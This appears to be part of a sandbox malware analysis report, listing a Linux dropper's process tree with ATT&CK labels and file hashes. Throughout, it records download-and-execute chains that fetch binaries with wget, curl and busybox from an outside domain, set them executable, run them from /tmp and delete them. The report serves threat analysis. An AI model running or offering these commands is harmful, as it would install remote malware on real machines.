- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:961
-
-
/bin/chmodchmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:968
-
-
/bin/chmodchmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:996
-
-
/bin/chmodchmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97